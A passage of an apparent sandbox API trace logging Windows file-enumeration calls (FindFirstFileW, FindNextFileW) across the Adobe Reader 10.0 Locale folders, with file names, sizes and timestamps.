ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Spelling.NLD", cAlternateFileName="")) returned 1 [0058.547] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f4e4720, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="updater.NLD", cAlternateFileName="")) returned 1 [0058.548] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82cd4c20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weblink.NLD", cAlternateFileName="")) returned 1 [0058.548] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82cd4c20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Weblink.NLD", cAlternateFileName="")) returned 0 [0058.548] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.548] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7bb9a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x832c8320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x832c8320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl_PL", cAlternateFileName="")) returned 1 [0058.548] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7bb9a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x832c8320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x832c8320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.551] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d7bb9a0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x832c8320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x832c8320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.551] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dbbfec0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xac00, dwReserved0=0x0, dwReserved1=0x0, cFileName="accessibility.POL", cAlternateFileName="ACCESS~1.POL")) returned 1 [0058.551] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x83197820, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x68200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acroform.POL", cAlternateFileName="")) returned 1 [0058.551] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81d0fa60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeCollabSync.POL", cAlternateFileName="ADOBEC~1.POL")) returned 1 [0058.551] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x832c8320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7bc00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Annots.POL", cAlternateFileName="")) returned 1 [0058.552] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8207ba00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3600, dwReserved0=0x0, dwReserved1=0x0, cFileName="BRdlang32.POL", cAlternateFileName="BRDLAN~1.POL")) returned 1 [0058.552] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x831bd980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Checkers.POL", cAlternateFileName="")) returned 1 [0058.552] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x831bd980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1f000, dwReserved0=0x0, dwReserved1=0x0, cFileName="DigSig.POL", cAlternateFileName="")) returned 1 [0058.552] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x831bd980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4800, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVA.POL", cAlternateFileName="")) returned 1 [0058.552] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8327c060, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="eBook.POL", cAlternateFileName="")) returned 1 [0058.552] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x831bd980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xa000, dwReserved0=0x0, dwReserved1=0x0, cFileName="EScript.POL", cAlternateFileName="")) returned 1 [0058.552] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x831bd980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="IA32.POL", cAlternateFileName="")) returned 1 [0058.552] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7db4daa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x12400, dwReserved0=0x0, dwReserved1=0x0, cFileName="makeaccessible.POL", cAlternateFileName="MAKEAC~1.POL")) returned 1 [0058.552] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d7bb9a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x13600, dwReserved0=0x0, dwReserved1=0x0, cFileName="Multimedia.POL", cAlternateFileName="MULTIM~1.POL")) returned 1 [0058.552] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7db27940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="pddom.POL", cAlternateFileName="")) returned 1 [0058.553] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x831bd980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7e800, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPKLite.POL", cAlternateFileName="")) returned 1 [0058.553] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x807a3460, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x14d600, dwReserved0=0x0, dwReserved1=0x0, cFileName="RdLang32.POL", cAlternateFileName="")) returned 1 [0058.553] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x832a21c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ReadOutLoud.POL", cAlternateFileName="READOU~1.POL")) returned 1 [0058.553] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dbbfec0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x0, dwReserved1=0x0, cFileName="reflow.POL", cAlternateFileName="")) returned 1 [0058.553] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dadb680, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4800, dwReserved0=0x0, dwReserved1=0x0, cFileName="SaveAsRTF.POL", cAlternateFileName="SAVEAS~1.POL")) returned 1 [0058.553] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x831bd980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x5e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Search.POL", cAlternateFileName="")) returned 1 [0058.553] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x831bd980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendMail.POL", cAlternateFileName="")) returned 1 [0058.553] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0058.553] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pl_PL\\Services\\*.*", lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa40 [0058.554] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x81f4af00, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x81fbd320, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.554] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81fbd320, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x94c7, dwReserved0=0x0, dwReserved1=0x0, cFileName="DEXShare.asfx", cAlternateFileName="DEXSHA~1.ASF")) returned 1 [0058.554] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f4af00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 1 [0058.554] FindNextFileW (in: hFindFile=0x69aa40, lpFindFileData=0x18e464 | out: lpFindFileData=0x18e464*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81f4af00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xe9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services.asfx", cAlternateFileName="SERVIC~1.ASF")) returned 0 [0058.554] FindClose (in: hFindFile=0x69aa40 | out: hFindFile=0x69aa40) returned 1 [0058.554] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7dfea540, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2800, dwReserved0=0x0, dwReserved1=0x0, cFileName="Spelling.POL", cAlternateFileName="")) returned 1 [0058.554] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7f5309e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="updater.POL", cAlternateFileName="")) returned 1 [0058.554] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x831bd980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="WebLink.POL", cAlternateFileName="")) returned 1 [0058.554] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x831bd980, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="WebLink.POL", cAlternateFileName="")) returned 0 [0058.554] FindClose (in: hFindFile=0x69aa00 | out: hFindFile=0x69aa00) returned 1 [0058.555] FindNextFileW (in: hFindFile=0x69a9c0, lpFindFileData=0x18ea44 | out: lpFindFileData=0x18ea44*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d749580, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ec3e00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ec3e00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt_BR", cAlternateFileName="")) returned 1 [0058.555] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\pt_BR\\*.*", lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d749580, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ec3e00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ec3e00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x69aa00 [0058.556] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d749580, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x82ec3e00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x82ec3e00, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.557] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d9aab80, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0xac00, dwReserved0=0x0, dwReserved1=0x0, cFileName="accessibility.PTB", cAlternateFileName="ACCESS~1.PTB")) returned 1 [0058.557] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d20ee0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x69400, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acroform.PTB", cAlternateFileName="")) returned 1 [0058.557] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x801d5ec0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeCollabSync.PTB", cAlternateFileName="ADOBEC~1.PTB")) returned 1 [0058.557] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d93300, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x79e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Annots.PTB", cAlternateFileName="")) returned 1 [0058.557] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8207ba00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3600, dwReserved0=0x0, dwReserved1=0x0, cFileName="BRdlang32.PTB", cAlternateFileName="BRDLAN~1.PTB")) returned 1 [0058.557] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82d6d1a0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x1f000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Checkers.PTB", cAlternateFileName="")) returned 1 [0058.557] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, 